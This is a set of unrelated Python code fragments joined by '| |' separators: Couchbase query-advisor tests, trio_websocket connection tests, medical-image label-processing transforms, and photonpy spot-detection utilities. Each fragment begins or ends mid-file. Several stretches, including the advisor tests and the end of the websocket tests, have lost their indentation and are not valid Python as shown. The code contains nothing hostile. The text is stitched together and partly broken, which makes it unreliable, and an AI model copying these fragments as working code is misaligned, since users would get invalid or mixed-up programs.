session = self.run_cbq_query(query=f"SELECT ADVISOR({action['cmd']})", server=self.master)
except CBQError as ex:
self.assertTrue(str(ex).find(action['msg']) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_list(self):
error = "Error evaluating projection. - cause: advisor() not valid argument for 'status'"
try:
session = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status':'stopped'})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_missing_session(self):
error = "Error evaluating projection. - cause: advisor() not valid argument for 'session'"
try:
session = self.run_cbq_query(query="SELECT ADVISOR({'action':'get'})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_negative_invalid_session(self):
error = "Error evaluating projection. - cause: advisor() not valid argument for 'session'"
for action in ['get','purge','stop','abort']:
try:
session = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'{action}', 'session':123456}})", server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def run_async_query(self, query, username, password, server):
results = self.run_cbq_query(query=query, username=username, password=password, server=server)
# Check the query has been cancelled
self.assertEqual(results['status'], "stopped")
def test_session_query_cancel(self):
long_query = f"SELECT DISTINCT MIN(aport.airportname) AS Airport__Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `{self.bucket_name}` aport LEFT JOIN `travel-sample` lmark ON aport.city = lmark.city AND lmark.country = 'United States' AND lmark.type = 'landmark' WHERE aport.type = 'airport' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
self.users = [{"id": "jimDoe", "name": "<NAME>", "password": "<PASSWORD>"}]
self.create_users()
role = "admin"
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant = self.run_cbq_query(query=f"GRANT {role} to {user_id}",server=self.master)
cancel_query = f"DELETE FROM system:active_requests WHERE users = '{user_id}'"
# Create index for join query
create_index = f"CREATE INDEX `def_city` ON `{self.bucket_name}`(`city`)"
results = self.run_cbq_query(query=create_index,server=self.master)
th = threading.Thread(target=self.run_async_query,args=(long_query, user_id, user_pwd, self.master))
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
session = start['results'][0]['$1']['session']
# Spawn query in a thread
th.start()
# Cancel query
self.sleep(1)
cancel = self.run_cbq_query(query=cancel_query,username=user_id, password=<PASSWORD>, server=self.master)
th.join()
# Stop and get session advise
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], long_query)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_query_timeout(self):
    """Verify an ADVISOR session records a query that exceeded its timeout.

    The long join query is run with a 500ms timeout so it fails with a
    timeout error; the advisor session must still record the statement.
    """
    long_query = f"SELECT DISTINCT MIN(aport.airportname) AS Airport__Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `{self.bucket_name}` aport LEFT JOIN `travel-sample` lmark ON aport.city = lmark.city AND lmark.country = 'United States' AND lmark.type = 'landmark' WHERE aport.type = 'airport' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
    # Create index for join query
    create_index = f"CREATE INDEX `def_city` ON `{self.bucket_name}`(`city`)"
    results = self.run_cbq_query(query=create_index, server=self.master)
    try:
        start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
        session = start['results'][0]['$1']['session']
        try:
            results = self.run_cbq_query(query=long_query, query_params={'timeout': '500ms'}, server=self.master)
        except CBQError as ex:
            # BUG FIX: `find(...) > 0` would wrongly fail on a match at
            # index 0; use a membership assertion instead.
            self.assertIn("Timeout 500ms exceeded", str(ex))
        # Stop and get session advise
        stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", server=self.master)
        get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", server=self.master)
        for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
            for statement in index['statements']:
                self.assertEqual(statement['statement'], long_query)
    except Exception as e:
        self.log.error("Advisor session failed: {0}".format(e))
        # Include the cause in the failure so it is visible in the report
        self.fail(f"Advisor session failed: {e}")
def test_session_collection(self):
advise_index1 = "CREATE INDEX adv_lower_city_country ON `default`:`travel-sample`.`inventory`.`airport`(lower(`city`),`country`)"
advise_index2 = "CREATE INDEX adv_country_lower_city ON `default`:`travel-sample`.`inventory`.`airport`(`country`,lower(`city`))"
query1=f'SELECT airportname FROM `{self.bucket_name}`.inventory.airport WHERE lower(city) = "lyon" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
results = self.run_cbq_query(query=query1, server=self.master)
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception | |
<filename>tests/test_connection.py
'''
Unit tests for trio_websocket.
Many of these tests involve networking, i.e. real TCP sockets. To maximize
reliability, all networking tests should follow the following rules:
- Use localhost only. This is stored in the ``HOST`` global variable.
- Servers use dynamic ports: by passing zero as a port, the system selects a
port that is guaranteed to be available.
- The sequence of events between servers and clients should be controlled as
much as possible to make tests deterministic. More on determinism below.
- If a test involves timing, e.g. a task needs to ``trio.sleep(…)`` for a bit,
then the ``autojump_clock`` fixture should be used.
- Most tests that involve I/O should have an absolute timeout placed on it to
prevent a hung test from blocking the entire test suite. If a hung test is
cancelled with ctrl+C, then PyTest discards its log messages, which makes
debugging really difficult! The ``fail_after(…)`` decorator places an absolute
timeout on test execution, as measured by Trio's clock.
`Read more about writing tests with pytest-trio.
<https://pytest-trio.readthedocs.io/en/latest/>`__
Determinism is an important property of tests, but it can be tricky to
accomplish with network tests. For example, if a test has a client and a server,
then they may race each other to close the connection first. The test author
should select one side to always initiate the closing handshake. For example, if
a test needs to ensure that the client closes first, then it can have the server
call ``ws.get_message()`` without actually sending it a message. This will cause
the server to block until the client has sent the closing handshake. In other
circumstances
'''
from functools import partial, wraps
import attr
import pytest
import trio
import trustme
from async_generator import async_generator, yield_
from trio_websocket import (
connect_websocket,
connect_websocket_url,
ConnectionClosed,
open_websocket,
open_websocket_url,
serve_websocket,
WebSocketServer,
wrap_client_stream,
wrap_server_stream
)
from trio_websocket._impl import ListenPort
HOST = '127.0.0.1'
RESOURCE = '/resource'
DEFAULT_TEST_MAX_DURATION = 1
# Timeout tests follow a general pattern: one side waits TIMEOUT seconds for an
# event. The other side delays for FORCE_TIMEOUT seconds to force the timeout
# to trigger. Each test also has maximum runtime (measure by Trio's clock) to
# prevent a faulty test from hanging the entire suite.
TIMEOUT = 1
FORCE_TIMEOUT = 2
TIMEOUT_TEST_MAX_DURATION = 3
@pytest.fixture
@async_generator
async def echo_server(nursery):
    ''' A server that reads one message, sends back the same message,
    then closes the connection. '''
    # Port 0 asks the OS for any free port; tests read the chosen port
    # from the yielded server object (``server.port``).
    serve_fn = partial(serve_websocket, echo_request_handler, HOST, 0,
        ssl_context=None)
    server = await nursery.start(serve_fn)
    await yield_(server)
@pytest.fixture
@async_generator
async def echo_conn(echo_server):
    ''' Return a client connection instance that is connected to an echo
    server. '''
    # Yield inside the context manager so the connection is closed
    # automatically when the test finishes.
    async with open_websocket(HOST, echo_server.port, RESOURCE,
            use_ssl=False) as conn:
        await yield_(conn)
async def echo_request_handler(request):
    '''
    Accept an incoming request, then echo a single message back to the peer.
    '''
    ws = await request.accept()
    try:
        message = await ws.get_message()
        await ws.send_message(message)
    except ConnectionClosed:
        # The client may close before or during the echo; fine for tests.
        pass
class fail_after:
    ''' Decorator that fails the test when the wrapped coroutine runs longer
    (on the Trio clock) than the given number of seconds. '''

    def __init__(self, seconds):
        self._limit = seconds

    def __call__(self, fn):
        @wraps(fn)
        async def wrapper(*args, **kwargs):
            # move_on_after cancels the body instead of raising, so the
            # timeout is detected via cancelled_caught afterwards.
            with trio.move_on_after(self._limit) as scope:
                await fn(*args, **kwargs)
            if scope.cancelled_caught:
                pytest.fail(
                    'Test runtime exceeded the maximum {} seconds'.format(
                        self._limit))
        return wrapper
@attr.s(hash=False, cmp=False)
class MemoryListener(trio.abc.Listener):
    # In-memory stand-in for a TCP listener, used to exercise server code
    # paths that must work with non-TCP transports.
    closed = attr.ib(default=False)            # set True by aclose()
    accepted_streams = attr.ib(factory=list)   # server-side streams handed out
    queued_streams = attr.ib(factory=(lambda: trio.open_memory_channel(1)))
    accept_hook = attr.ib(default=None)        # optional awaitable run in accept()

    async def connect(self):
        # Client side: create a stream pair, queue the server half for
        # accept(), and hand the client half back.
        assert not self.closed
        client, server = memory_stream_pair()
        await self.queued_streams[0].send(server)
        return client

    async def accept(self):
        await trio.hazmat.checkpoint()
        assert not self.closed
        if self.accept_hook is not None:
            await self.accept_hook()
        stream = await self.queued_streams[1].receive()
        self.accepted_streams.append(stream)
        return stream

    async def aclose(self):
        self.closed = True
        await trio.hazmat.checkpoint()
async def test_listen_port_ipv4():
    ''' The string form of an IPv4 ListenPort is ws(s)://host:port. '''
    cases = [
        (('10.105.0.2', 80, False), 'ws://10.105.0.2:80'),
        (('127.0.0.1', 8000, False), 'ws://127.0.0.1:8000'),
        (('0.0.0.0', 443, True), 'wss://0.0.0.0:443'),
    ]
    for args, expected in cases:
        assert str(ListenPort(*args)) == expected
async def test_listen_port_ipv6():
    ''' The string form of an IPv6 ListenPort wraps the address in brackets. '''
    # BUG FIX: the expected URL must contain the same address that was passed
    # to ListenPort; it previously compared against an unrelated address,
    # so the assertion could never hold.
    assert str(ListenPort('fdf8:f53e:61e4::18', 80, False)) \
        == 'ws://[fdf8:f53e:61e4::18]:80'
    assert str(ListenPort('::1', 8000, False)) == 'ws://[::1]:8000'
    assert str(ListenPort('::', 443, True)) == 'wss://[::]:443'
async def test_server_has_listeners(nursery):
    ''' A started server exposes at least one ListenPort in .listeners. '''
    server = await nursery.start(serve_websocket, echo_request_handler, HOST, 0,
        None)
    assert len(server.listeners) > 0
    assert isinstance(server.listeners[0], ListenPort)
async def test_serve(nursery):
    ''' Serving a client adds a nested nursery but no extra top-level task. '''
    task = trio.hazmat.current_task()
    server = await nursery.start(serve_websocket, echo_request_handler, HOST, 0,
        None)
    port = server.port
    assert server.port != 0
    # The server nursery begins with one task (server.listen).
    assert len(nursery.child_tasks) == 1
    no_clients_nursery_count = len(task.child_nurseries)
    async with open_websocket(HOST, port, RESOURCE, use_ssl=False) as conn:
        # The server nursery has the same number of tasks, but there is now
        # one additional nested nursery.
        assert len(nursery.child_tasks) == 1
        assert len(task.child_nurseries) == no_clients_nursery_count + 1
async def test_serve_ssl(nursery):
    ''' A TLS server accepts a client that trusts its certificate. '''
    server_context = trio.ssl.create_default_context(
        trio.ssl.Purpose.CLIENT_AUTH)
    client_context = trio.ssl.create_default_context()
    # trustme issues a throwaway CA and a localhost server certificate.
    ca = trustme.CA()
    ca.configure_trust(client_context)
    cert = ca.issue_server_cert(HOST)
    cert.configure_cert(server_context)
    server = await nursery.start(serve_websocket, echo_request_handler, HOST, 0,
        server_context)
    port = server.port
    async with open_websocket(HOST, port, RESOURCE, use_ssl=client_context
            ) as conn:
        assert not conn.closed
async def test_serve_handler_nursery(nursery):
    ''' Connection handlers run in the user-supplied handler nursery. '''
    task = trio.hazmat.current_task()
    async with trio.open_nursery() as handler_nursery:
        serve_with_nursery = partial(serve_websocket, echo_request_handler,
            HOST, 0, None, handler_nursery=handler_nursery)
        server = await nursery.start(serve_with_nursery)
        port = server.port
        # The server nursery begins with one task (server.listen).
        assert len(nursery.child_tasks) == 1
        no_clients_nursery_count = len(task.child_nurseries)
        async with open_websocket(HOST, port, RESOURCE, use_ssl=False) as conn:
            # The handler nursery should have one task in it
            # (conn._reader_task).
            assert len(handler_nursery.child_tasks) == 1
async def test_serve_with_zero_listeners(nursery):
    ''' Constructing a server with an empty listener list raises ValueError. '''
    # Removed two unused locals: the current-task handle was never read, and
    # binding the never-created server served no purpose.
    with pytest.raises(ValueError):
        WebSocketServer(echo_request_handler, [])
async def test_serve_non_tcp_listener(nursery):
    ''' A non-TCP listener works, but has no port; its metadata is a repr. '''
    listeners = [MemoryListener()]
    server = WebSocketServer(echo_request_handler, listeners)
    await nursery.start(server.run)
    assert len(server.listeners) == 1
    with pytest.raises(RuntimeError):
        server.port  # no TCP port to report for a memory listener
    assert server.listeners[0].startswith('MemoryListener(')
async def test_serve_multiple_listeners(nursery):
    ''' With two listeners, .port is ambiguous and metadata is per-listener. '''
    listener1 = (await trio.open_tcp_listeners(0, host=HOST))[0]
    listener2 = MemoryListener()
    server = WebSocketServer(echo_request_handler, [listener1, listener2])
    await nursery.start(server.run)
    assert len(server.listeners) == 2
    with pytest.raises(RuntimeError):
        # Even though the first listener has a port, this property is only
        # usable if you have exactly one listener.
        server.port
    # The first listener metadata is a ListenPort instance.
    assert server.listeners[0].port != 0
    # The second listener metadata is a string containing the repr() of a
    # MemoryListener object.
    assert server.listeners[1].startswith('MemoryListener(')
async def test_client_open(echo_server):
    ''' Opening a client connection to the echo server yields an open conn. '''
    async with open_websocket(
            HOST, echo_server.port, RESOURCE, use_ssl=False) as conn:
        assert not conn.closed
async def test_client_open_url(echo_server):
    ''' The connection path reflects the path and query of the URL. '''
    base = 'ws://{}:{}{}'.format(HOST, echo_server.port, RESOURCE)
    async with open_websocket_url(base + '/path') as conn:
        assert conn.path == RESOURCE + '/path'
    async with open_websocket_url(base + '?foo=bar') as conn:
        assert conn.path == RESOURCE + '?foo=bar'
async def test_client_open_invalid_url(echo_server):
    ''' A non-websocket URL scheme is rejected with ValueError. '''
    with pytest.raises(ValueError):
        async with open_websocket_url('http://foo.com/bar') as conn:
            pass
async def test_client_connect(echo_server, nursery):
    ''' connect_websocket() returns an open connection. '''
    conn = await connect_websocket(
        nursery, HOST, echo_server.port, RESOURCE, use_ssl=False)
    assert not conn.closed
async def test_client_connect_url(echo_server, nursery):
    ''' connect_websocket_url() returns an open connection. '''
    conn = await connect_websocket_url(
        nursery, 'ws://{}:{}{}'.format(HOST, echo_server.port, RESOURCE))
    assert not conn.closed
async def test_handshake_subprotocol(nursery):
    ''' The server picks one of the client's proposed subprotocols and both
    sides see the same choice after the handshake completes. '''
    async def handler(request):
        assert request.proposed_subprotocols == ('chat', 'file')
        assert request.subprotocol is None
        # The handler must select the subprotocol before accepting.
        request.subprotocol = 'chat'
        assert request.subprotocol == 'chat'
        server_ws = await request.accept()
        assert server_ws.subprotocol == 'chat'
    server = await nursery.start(serve_websocket, handler, HOST, 0, None)
    async with open_websocket(HOST, server.port, RESOURCE, use_ssl=False,
            subprotocols=('chat', 'file')) as client_ws:
        assert client_ws.subprotocol == 'chat'
async def test_client_send_and_receive(echo_conn):
    ''' A message sent to the echo server comes back unchanged. '''
    async with echo_conn:
        text = 'This is a test message.'
        await echo_conn.send_message(text)
        assert await echo_conn.get_message() == text
async def test_client_ping(echo_conn):
    ''' Ping succeeds on an open connection and raises once it is closed. '''
    async with echo_conn:
        await echo_conn.ping(b'A')
    with pytest.raises(ConnectionClosed):
        await echo_conn.ping(b'B')
async def test_client_ping_two_payloads(echo_conn):
    ''' Two concurrent pings (with distinct payloads) both receive pongs. '''
    pong_count = 0
    async def ping_and_count():
        nonlocal pong_count
        await echo_conn.ping()
        pong_count += 1
    async with echo_conn:
        # The nursery joins both ping tasks before the connection closes.
        async with trio.open_nursery() as nursery:
            nursery.start_soon(ping_and_count)
            nursery.start_soon(ping_and_count)
    assert pong_count == 2
async def test_client_ping_same_payload(echo_conn):
    # This test verifies that two tasks can't ping with the same payload at the
    # same time. One of them should succeed and the other should get an
    # exception.
    exc_count = 0
    async def ping_and_catch():
        nonlocal exc_count
        try:
            await echo_conn.ping(b'A')
        except ValueError:
            # A duplicate in-flight ping payload is rejected.
            exc_count += 1
    async with echo_conn:
        async with trio.open_nursery() as nursery:
            nursery.start_soon(ping_and_catch)
            nursery.start_soon(ping_and_catch)
    assert exc_count == 1
async def test_client_pong(echo_conn):
    ''' An unsolicited pong is allowed while open and raises after close. '''
    async with echo_conn:
        await echo_conn.pong(b'A')
    with pytest.raises(ConnectionClosed):
        await echo_conn.pong(b'B')
async def test_client_default_close(echo_conn):
    ''' Leaving the context closes with the default code 1000 and no reason. '''
    async with echo_conn:
        assert not echo_conn.closed
    assert echo_conn.closed.code == 1000
    assert echo_conn.closed.reason is None
async def test_client_nondefault_close(echo_conn):
    ''' An explicit aclose() propagates a custom close code and reason. '''
    async with echo_conn:
        assert not echo_conn.closed
        await echo_conn.aclose(code=1001, reason='test reason')
    assert echo_conn.closed.code == 1001
    assert echo_conn.closed.reason == 'test reason'
async def test_wrap_client_stream(echo_server, nursery):
    ''' A raw TCP stream can be wrapped into a working client websocket. '''
    stream = await trio.open_tcp_stream(HOST, echo_server.port)
    conn = await wrap_client_stream(nursery, stream, HOST, RESOURCE)
    async with conn:
        assert not conn.closed
        await conn.send_message('Hello from client!')
        msg = await conn.get_message()
        assert msg == 'Hello from client!'
    assert conn.closed
async def test_wrap_server_stream(nursery):
async def handler(stream):
request = await wrap_server_stream(nursery, stream)
server_ws = await request.accept()
async with server_ws:
assert not server_ws.closed
msg = await server_ws.get_message()
assert msg == 'Hello from client!'
assert server_ws.closed
serve_fn = partial(trio.serve_tcp, handler, 0, host=HOST)
listeners = await nursery.start(serve_fn)
port = listeners[0].socket.getsockname()[1]
| |
If the data is in one-hot format, this is used to determine which channels to apply.
independent: whether to treat ``applied_labels`` as a union of foreground labels.
If ``True``, the connected component analysis will be performed on each foreground label independently
and return the intersection of the largest components.
If ``False``, the analysis will be performed on the union of foreground labels.
default is `True`.
connectivity: Maximum number of orthogonal hops to consider a pixel/voxel as a neighbor.
Accepted values are ranging from 1 to input.ndim. If ``None``, a full
connectivity of ``input.ndim`` is used.
"""
super().__init__()
self.applied_labels = ensure_tuple(applied_labels)
self.independent = independent
self.connectivity = connectivity
def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
    """
    Args:
        img: shape must be (C, spatial_dim1[, spatial_dim2, ...]).
    Returns:
        An array with shape (C, spatial_dim1[, spatial_dim2, ...]).
    """
    # More than one channel is treated as a one-hot encoding; a single
    # channel is assumed to hold integer label values.
    is_onehot = img.shape[0] > 1
    if self.independent:
        # Keep the largest component of each applied label separately;
        # pixels outside that label's largest component are zeroed in place.
        for i in self.applied_labels:
            foreground = img[i] > 0 if is_onehot else img[0] == i
            mask = get_largest_connected_component_mask(foreground, self.connectivity)
            if is_onehot:
                img[i][foreground != mask] = 0
            else:
                img[0][foreground != mask] = 0
        return img
    if not is_onehot:  # not one-hot, union of labels
        labels, *_ = convert_to_dst_type(self.applied_labels, dst=img, wrap_sequence=True)
        foreground = (img[..., None] == labels).any(-1)[0]
        mask = get_largest_connected_component_mask(foreground, self.connectivity)
        img[0][foreground != mask] = 0
        return img
    # one-hot, union of labels
    foreground = (img[self.applied_labels, ...] == 1).any(0)
    mask = get_largest_connected_component_mask(foreground, self.connectivity)
    for i in self.applied_labels:
        img[i][foreground != mask] = 0
    return img
class LabelFilter:
    """
    Keep only the labels listed in ``applied_labels``; every other label is
    replaced by the background value (0). Useful as a processing step to view
    only certain labels.

    For example, with applied_labels=[1, 5, 9]::

        [1, 2, 3]    [1, 0, 0]
        [4, 5, 6] => [0, 5, 0]
        [7, 8, 9]    [0, 0, 9]
    """

    backend = [TransformBackends.TORCH, TransformBackends.NUMPY]

    def __init__(self, applied_labels: Union[Iterable[int], int]) -> None:
        """
        Args:
            applied_labels: Label(s) to filter on.
        """
        self.applied_labels = ensure_tuple(applied_labels)

    def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
        """
        Filter the image on the `applied_labels`.

        Args:
            img: Pytorch tensor or numpy array of any shape.
        Raises:
            NotImplementedError: The provided image was not a Pytorch Tensor or numpy array.
        Returns:
            Pytorch tensor or numpy array of the same shape as the input.
        """
        if not isinstance(img, (np.ndarray, torch.Tensor)):
            raise NotImplementedError(f"{self.__class__} can not handle data of type {type(img)}.")
        if isinstance(img, np.ndarray):
            return np.asarray(np.where(np.isin(img, self.applied_labels), img, 0))
        # torch path: use torch.isin where this torch version provides it,
        # otherwise fall back to the numpy branch and convert back.
        if hasattr(torch, "isin"):
            appl_lbls = torch.as_tensor(self.applied_labels, device=img.device)
            return torch.where(torch.isin(img, appl_lbls), img, torch.tensor(0.0).to(img))
        out = self(img.detach().cpu().numpy())
        out, *_ = convert_to_dst_type(out, img)
        return out
class FillHoles(Transform):
    r"""
    Fill enclosed holes in segmentation images, e.g. to remove artifacts
    inside segments.

    An enclosed hole is a background pixel/voxel surrounded by a single class
    only; the connectivity parameter controls what counts as enclosed::

        1-connectivity     2-connectivity     diagonal connection close-up

             [ ]           [ ]  [ ]  [ ]             [ ]
              |               \  |  /                 |  <- hop 2
        [ ]--[x]--[ ]      [ ]--[x]--[ ]        [x]--[ ]
              |               /  |  \             hop 1
             [ ]           [ ]  [ ]  [ ]

    The input is a PyTorch Tensor or numpy array of shape
    [C, spatial_dim1[, spatial_dim2, ...]]. With C = 1 the values are label
    indices; with C > 1 a one-hot encoding is expected, with the index of C
    matching the label indexing.

    Note:
        Label 0 is treated as background and enclosed holes are set to the
        neighboring class label. Runtime depends heavily on the number of
        labels, so limiting ``applied_labels`` decreases processing time a lot.

    For example, with default parameters::

        [1, 1, 1, 2, 2, 2, 3, 3]    [1, 1, 1, 2, 2, 2, 3, 3]
        [1, 0, 1, 2, 0, 0, 3, 0] => [1, 1, 1, 2, 0, 0, 3, 0]
        [1, 1, 1, 2, 2, 2, 3, 3]    [1, 1, 1, 2, 2, 2, 3, 3]

    The hole in label 1 is fully enclosed and filled with label 1, while the
    background next to labels 2 and 3 is not enclosed and stays unchanged.
    """

    backend = [TransformBackends.NUMPY]

    def __init__(
        self, applied_labels: Optional[Union[Iterable[int], int]] = None, connectivity: Optional[int] = None
    ) -> None:
        """
        Initialize the connectivity and limit the labels for which holes are filled.

        Args:
            applied_labels: Labels for which to fill holes. ``None`` (default) fills holes for all labels.
            connectivity: Maximum number of orthogonal hops to consider a pixel/voxel a neighbor.
                Accepted values range from 1 to ``input.ndim``; defaults to full connectivity.
        """
        super().__init__()
        self.connectivity = connectivity
        self.applied_labels = ensure_tuple(applied_labels) if applied_labels else None

    def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
        """
        Fill the holes in the provided image (value 0 is assumed background).

        Args:
            img: Pytorch Tensor or numpy array of shape [C, spatial_dim1[, spatial_dim2, ...]].
        Raises:
            NotImplementedError: The provided image was not a Pytorch Tensor or numpy array.
        Returns:
            Pytorch Tensor or numpy array of shape [C, spatial_dim1[, spatial_dim2, ...]].
        """
        if not isinstance(img, (np.ndarray, torch.Tensor)):
            raise NotImplementedError(f"{self.__class__} can not handle data of type {type(img)}.")
        # fill_holes works on numpy; convert there and back so the caller
        # receives the same container type it passed in.
        img_np: np.ndarray
        img_np, *_ = convert_data_type(img, np.ndarray)  # type: ignore
        filled: np.ndarray = fill_holes(img_np, self.applied_labels, self.connectivity)
        out, *_ = convert_to_dst_type(filled, img)
        return out
class LabelToContour(Transform):
    """
    Extract the contour of binary input images (composed only of 0 and 1)
    using a Laplacian kernel, e.g. to plot the edge of a label map or
    segmentation output.

    Args:
        kernel_type: edge-detection method; only "Laplace" is supported.
    Raises:
        NotImplementedError: When ``kernel_type`` is not "Laplace".
    """

    backend = [TransformBackends.TORCH]

    def __init__(self, kernel_type: str = "Laplace") -> None:
        if kernel_type != "Laplace":
            raise NotImplementedError('Currently only kernel_type="Laplace" is supported.')
        self.kernel_type = kernel_type

    def __call__(self, img: NdarrayOrTensor) -> NdarrayOrTensor:
        """
        Args:
            img: data to extract the contour from, shape [channels, height, width[, depth]].
        Raises:
            ValueError: When ``image`` ndim is not one of [3, 4].
        Returns:
            A tensor/array with the same shape as ``img``. Notes:

            1. each value is the binary classification of whether a pixel is an edge.
            2. padding keeps the original shape of the mask image.
            3. detection is approximate: Laplace-kernel edges have some thickness.
        """
        img_t: torch.Tensor = convert_data_type(img, torch.Tensor)[0]  # type: ignore
        spatial_dims = img_t.ndim - 1
        img_t = img_t.unsqueeze(0)  # apply_filter expects a batch dimension
        if spatial_dims == 2:
            kernel = torch.tensor([[-1, -1, -1], [-1, 8, -1], [-1, -1, -1]], dtype=torch.float32)
        elif spatial_dims == 3:
            kernel = -1.0 * torch.ones(3, 3, 3, dtype=torch.float32)
            kernel[1, 1, 1] = 26.0
        else:
            raise ValueError(f"{self.__class__} can only handle 2D or 3D images.")
        edges = apply_filter(img_t, kernel).clamp_(min=0.0, max=1.0)
        output, *_ = convert_to_dst_type(edges.squeeze(0), img)
        return output
class Ensemble:
    @staticmethod
    def get_stacked_torch(img: Union[Sequence[NdarrayOrTensor], NdarrayOrTensor]) -> torch.Tensor:
        """Normalize a sequence or single np.ndarray/torch.Tensor to one torch.Tensor.

        A sequence is stacked along a new leading dimension.
        """
        if isinstance(img, np.ndarray):
            img = torch.as_tensor(img)
        elif isinstance(img, Sequence) and isinstance(img[0], np.ndarray):
            img = [torch.as_tensor(i) for i in img]
        out: torch.Tensor = torch.stack(img) if isinstance(img, Sequence) else img  # type: ignore
        return out

    @staticmethod
    def post_convert(img: torch.Tensor, orig_img: Union[Sequence[NdarrayOrTensor], NdarrayOrTensor]) -> NdarrayOrTensor:
        """Convert ``img`` back to the type of ``orig_img`` (first element if a sequence)."""
        reference = orig_img[0] if isinstance(orig_img, Sequence) else orig_img
        out, *_ = convert_to_dst_type(img, reference)
        return out
class MeanEnsemble(Ensemble, Transform):
"""
Execute mean ensemble on the input data.
The input data can be a list or tuple of PyTorch Tensor with shape: | |
<reponame>qnano/photonpy<gh_stars>1-10
import numpy as np
import time
import tqdm
import os
from photonpy import Context, GaussianPSFMethods, Estimator, Dataset
import photonpy.cpp.spotdetect as spotdetect
from photonpy.cpp.calib import GainOffset_Calib
from photonpy.cpp.calib import GainOffsetImage_Calib
from photonpy.cpp.estim_queue import EstimQueue
from photonpy.cpp.roi_queue import ROIQueue
from photonpy.cpp.image_proc import ROIExtractor
import photonpy.utils.multipart_tiff as tiff
import tifffile
import matplotlib.pyplot as plt
from photonpy.utils.array import peek_first
from scipy.interpolate import InterpolatedUnivariateSpline
def end_of_file(f):
    """Return True when the file object's position is at the end of the file.

    The size is probed by seeking to EOF and back, so the stream must be
    seekable; the current position is restored before returning.
    """
    here = f.tell()
    f.seek(0, 2)  # jump to EOF to learn the file size
    size = f.tell()
    f.seek(here, 0)
    return here == size
def detect_spots(sdcfg, calib, movie, sumframes, output_fn, batch_size, ctx:Context, numThreads=3):
    """Run spot detection over a movie and stream detected ROIs to a file.

    Args:
        sdcfg: spot-detector configuration (provides ``roisize``).
        calib: camera calibration object applied to raw frames.
        movie: iterable of 2D uint16 frames.
        sumframes: number of frames summed per detection frame.
        output_fn: binary file to write; each batch appends a rois_info
            array followed by a pixels array via ``np.save``.
        batch_size: fetch/save queued results once this many are pending.
        ctx: photonpy Context.
        numThreads: worker threads for the detection queue.

    Returns:
        (numrois, numframes): total ROIs saved and frames pushed.
    """
    sm = spotdetect.SpotDetectionMethods(ctx)
    with Context(ctx.smlm) as lq_ctx, open(output_fn, "wb") as f:
        roishape = [sdcfg.roisize,sdcfg.roisize]
        numframes = 0
        numrois = 0
        for i,img in enumerate(movie):
            if i==0:
                # The queue needs the frame shape, so it is created lazily
                # on the first frame.
                q,rq = sm.CreateQueue(img.shape, roishape, sdcfg, calib=calib,sumframes=sumframes, ctx=lq_ctx, numThreads=numThreads)
                def save_rois(rois_info, pixels):
                    # Append one (info, pixels) batch to the output stream.
                    np.save(f, rois_info, allow_pickle=False)
                    np.save(f, pixels, allow_pickle=False)
                    nonlocal numrois
                    numrois += len(rois_info)
            q.PushFrameU16(img)
            numframes += 1
            rl = rq.Length()
            if rl>batch_size:
                save_rois(*rq.Fetch())
        # Drain: wait until every pushed frame has been processed, then
        # flush any remaining queued ROIs.
        while q.NumFinishedFrames() < numframes//sumframes:
            time.sleep(0.1)
        if rq.Length()>0:
            save_rois(*rq.Fetch())
    return numrois, numframes
def load_rois_iterator(rois_fn, maxrois=None):
    """
    Yield (rois_info, pixels) batches from a file written by detect_spots.

    Batches are read sequentially so very large datasets never need to be
    resident in memory at once. When ``maxrois`` is given, iteration stops
    after that many ROIs and the final batch is truncated accordingly.
    """
    with open(rois_fn, "rb") as f:
        loaded = 0
        while not end_of_file(f):
            rois_info = np.load(f)
            pixels = np.load(f)
            if maxrois is not None and loaded + len(pixels) >= maxrois:
                keep = maxrois - loaded
                yield rois_info[:keep], pixels[:keep]
                return
            loaded += len(pixels)
            yield rois_info, pixels
def load_rois(rois_fn, maxrois=None):
